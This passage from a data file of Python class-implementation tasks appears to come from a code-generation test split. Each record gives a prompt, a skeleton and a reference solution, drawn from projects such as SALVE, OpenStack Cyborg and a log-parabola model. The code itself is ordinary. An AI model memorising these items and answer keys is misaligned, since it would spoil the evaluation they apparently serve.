ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n<|end_body_0|>\n\n<|body_start_1|>\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: 
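In the LogParabola1D record above, each fit_deriv term follows from writing f as amplitude * exp(exponent * log(x/x_0)) with exponent = -alpha - beta*log(x/x_0); for example, df/dalpha = -f * log(x/x_0), which is exactly the d_alpha expression. A quick finite-difference spot check (the values are illustrative; any x != x_0 exercises the log term):

    import numpy as np

    x, amplitude, x_0, alpha, beta = 2.0, 1.5, 1.0, 2.0, 0.5

    def f(a):
        xx = x / x_0
        return amplitude * xx ** (-a - beta * np.log(xx))

    eps = 1e-6
    numeric = (f(alpha + eps) - f(alpha - eps)) / (2 * eps)
    analytic = -f(alpha) * np.log(x / x_0)  # the d_alpha term from fit_deriv
    assert np.isclose(numeric, analytic)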
{1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "DirCopyAction", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DirCopyAction:\n\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n <|body_0|>\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n<|end_body_0|>\n\n<|body_start_1|>\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000278", "length_bytes": 2041, "license_type": "permissive", "methods": [{"docstring": "Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.", "name": "verify_can_exec", "signature": "def verify_can_exec(self, filesys)"}, {"docstring": "Copy a directory tree from one location to another.", "name": "execute", "signature": "def execute(self, filesys)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007349", "prompt": "Implement the Python class `DirCopyAction` described below.\n\nClass description:\nImplement the DirCopyAction class.\n\nMethod signatures and docstrings:\n- def verify_can_exec(self, filesys): Check to ensure that execution can proceed without errors. 
Ensures that the the target directory is writable.\n- def execute(self, filesys): Copy a directory tree from one location to another.", "prompted_full_text": "Implement the Python class `DirCopyAction` described below.\n\nClass description:\nImplement the DirCopyAction class.\n\nMethod signatures and docstrings:\n- def verify_can_exec(self, filesys): Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\n- def execute(self, filesys): Copy a directory tree from one location to another.\n\n<|skeleton|>\nclass DirCopyAction:\n\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n <|body_0|>\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n<|end_body_0|>\n\n<|body_start_1|>\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n<|end_body_1|>\n", "revision_id": "5711b5c71e39b958bc8185c6b893358de7598ae2", "skeleton": "<|skeleton|>\nclass DirCopyAction:\n\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n <|body_0|>\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DirCopyAction:\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. 
Ensures that the the target directory is writable.\"\"\"\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n", "source": "the_stack_v2_python_sparse", "source_path": "salve/action/copy/directory.py", "source_repo": "sirosen/SALVE", "split": "test", "star_events_count": 0} {"blob_id": "dbf8940ed3023eb789da4e9bf24c4b8d091529ff", "bodies": ["deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\ndeployable_obj.create(context)\nif hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\nif hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)", "dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\nif hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\nif hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\nif dep_obj is not None:\n dep_obj.destroy(context)", "dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\ndriver_dep_obj_list = []\nfor dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\nreturn driver_dep_obj_list", "dep_obj = Deployable.get_by_name(context, name)\ndriver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\ndriver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\ndriver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\nreturn driver_dep_obj"], "bodies_text": "<|body_start_0|>\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, 
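DirCopyAction, which closes in the line above, follows SALVE's verify-then-execute pattern: execute() re-runs verify_can_exec() and downgrades each failure code to a warning and an early return instead of raising. The access_codes flags mirror the standard library's mode bits, so, assuming filesys wraps os (an assumption; SALVE's filesys is its own abstraction), the two checks amount to:

    import os

    src, dst = '/path/to/src', '/path/to/dst'  # placeholder paths for illustration
    readable_and_traversable = os.access(src, os.R_OK | os.X_OK)
    writable_parent = os.access(os.path.dirname(dst), os.W_OK)

Two quirks preserved verbatim from the upstream blob: the "Checking source is readable + traversable" log line interpolates self.dst rather than self.src, and logger.warn is the long-deprecated alias of the logging module's warning method.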
driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n<|end_body_0|>\n\n<|body_start_1|>\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n<|end_body_1|>\n\n<|body_start_2|>\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n<|end_body_2|>\n\n<|body_start_3|>\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n<|end_body_3|>\n", "class_docstring": "", "class_name": "DriverDeployable", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DriverDeployable:\n\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n <|body_0|>\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. 
Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n <|body_1|>\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_2|>\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n<|end_body_0|>\n\n<|body_start_1|>\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n<|end_body_1|>\n\n<|body_start_2|>\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n<|end_body_2|>\n\n<|body_start_3|>\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000279", "length_bytes": 5621, "license_type": "permissive", "methods": [{"docstring": "Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.", "name": "create", "signature": "def create(self, context, device_id, cpid_id)"}, {"docstring": "delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle", "name": "destroy", "signature": "def destroy(self, context, device_id)"}, {"docstring": "Form driver-side Deployable object list from DB for one device.", "name": "list", "signature": "def list(cls, context, device_id)"}, {"docstring": "Form driver-side Deployable object list from DB for one device.", "name": "get_by_name", "signature": "def get_by_name(cls, context, name)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_val_000311", "prompt": "Implement the Python class `DriverDeployable` described below.\n\nClass description:\nImplement the DriverDeployable class.\n\nMethod signatures and docstrings:\n- def create(self, context, device_id, cpid_id): Create a driver-side Deployable object into DB. 
This object will be stored in separate db tables: deployable & attach_handle & attribute table.\n- def destroy(self, context, device_id): delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\n- def list(cls, context, device_id): Form driver-side Deployable object list from DB for one device.\n- def get_by_name(cls, context, name): Form driver-side Deployable object list from DB for one device.", "prompted_full_text": "Implement the Python class `DriverDeployable` described below.\n\nClass description:\nImplement the DriverDeployable class.\n\nMethod signatures and docstrings:\n- def create(self, context, device_id, cpid_id): Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\n- def destroy(self, context, device_id): delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\n- def list(cls, context, device_id): Form driver-side Deployable object list from DB for one device.\n- def get_by_name(cls, context, name): Form driver-side Deployable object list from DB for one device.\n\n<|skeleton|>\nclass DriverDeployable:\n\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n <|body_0|>\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n <|body_1|>\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_2|>\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n<|end_body_0|>\n\n<|body_start_1|>\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n<|end_body_1|>\n\n<|body_start_2|>\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return 
driver_dep_obj_list\n<|end_body_2|>\n\n<|body_start_3|>\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n<|end_body_3|>\n", "revision_id": "ab8b8514242895b8adc2ec3dfbbb63a49f02c89e", "skeleton": "<|skeleton|>\nclass DriverDeployable:\n\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n <|body_0|>\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n <|body_1|>\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_2|>\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DriverDeployable:\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. 
Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n", "source": "the_stack_v2_python_sparse", "source_path": "cyborg/objects/driver_objects/driver_deployable.py", "source_repo": "openstack/cyborg", "split": "test", "star_events_count": 41} {"blob_id": "3ecba5e53a0030b52cda723137f6b55a5e94134f", "bodies": ["stemmed = global_stemmer.stem(word)\nif stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\ncls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\nreturn stemmed", "if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\nelse:\n return word"], "bodies_text": "<|body_start_0|>\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n<|end_body_0|>\n\n<|body_start_1|>\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n<|end_body_1|>\n", "class_docstring": "Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.", "class_name": "StemmingHelper", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. 
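DriverDeployable, completed above, fans a single driver-side object out across three tables (deployable, attach_handle, attribute) in create() and reassembles the same shape in list() and get_by_name(). Both of the latter take cls, so they are presumably classmethods in the full Cyborg source; the skeleton renders them without decorators. The intended call pattern looks roughly like the following, with ctx, dev, and cpid as placeholder context and DB objects, so this sketch only runs inside a configured Cyborg deployment:

    # Persist a freshly enumerated deployable for one device:
    drv_dep = DriverDeployable(context=ctx, name='fpga_0',
                               num_accelerators=1, driver_name='intel_fpga')
    drv_dep.create(ctx, device_id=dev.id, cpid_id=cpid.id)

    # Rebuild every driver-side view of that device from the DB:
    for dep in DriverDeployable.list(ctx, dev.id):
        print(dep.name, len(dep.attach_handle_list))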
The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n <|body_0|>\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n<|end_body_0|>\n\n<|body_start_1|>\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000280", "length_bytes": 3980, "license_type": "no_license", "methods": [{"docstring": "Stems a word and updates the reverse lookup.", "name": "stem", "signature": "def stem(cls, word)"}, {"docstring": "Returns original form of a word given the stemmed version, as stored in the word lookup.", "name": "original_form", "signature": "def original_form(cls, word)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002273", "prompt": "Implement the Python class `StemmingHelper` described below.\n\nClass description:\nClass to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\n\nMethod signatures and docstrings:\n- def stem(cls, word): Stems a word and updates the reverse lookup.\n- def original_form(cls, word): Returns original form of a word given the stemmed version, as stored in the word lookup.", "prompted_full_text": "Implement the Python class `StemmingHelper` described below.\n\nClass description:\nClass to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\n\nMethod signatures and docstrings:\n- def stem(cls, word): Stems a word and updates the reverse lookup.\n- def original_form(cls, word): Returns original form of a word given the stemmed version, as stored in the word lookup.\n\n<|skeleton|>\nclass StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n <|body_0|>\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n<|end_body_0|>\n\n<|body_start_1|>\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n<|end_body_1|>\n", "revision_id": "a4247074004c77c078e6d4b7270b517753df51a5", "skeleton": "<|skeleton|>\nclass StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. 
The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n <|body_0|>\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n", "source": "the_stack_v2_python_sparse", "source_path": "Programming/python/word2vec/word2vec_utitlity.py", "source_repo": "PythEsc/Research_project2", "split": "test", "star_events_count": 2} {"blob_id": "0aa06497395ee14ed1746e725d2607b987ead4e7", "bodies": ["if root is None:\n return []\nqueue = deque([root])\nans = []\nans.append(['#', root.val])\nwhile queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\nreturn ans", "if len(data) == 0:\n return None\nroot_val = data.pop(0)[1]\nroot_node = Node(root_val, [])\nqueue = deque([root_node])\nwhile queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\nreturn root_node"], "bodies_text": "<|body_start_0|>\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return 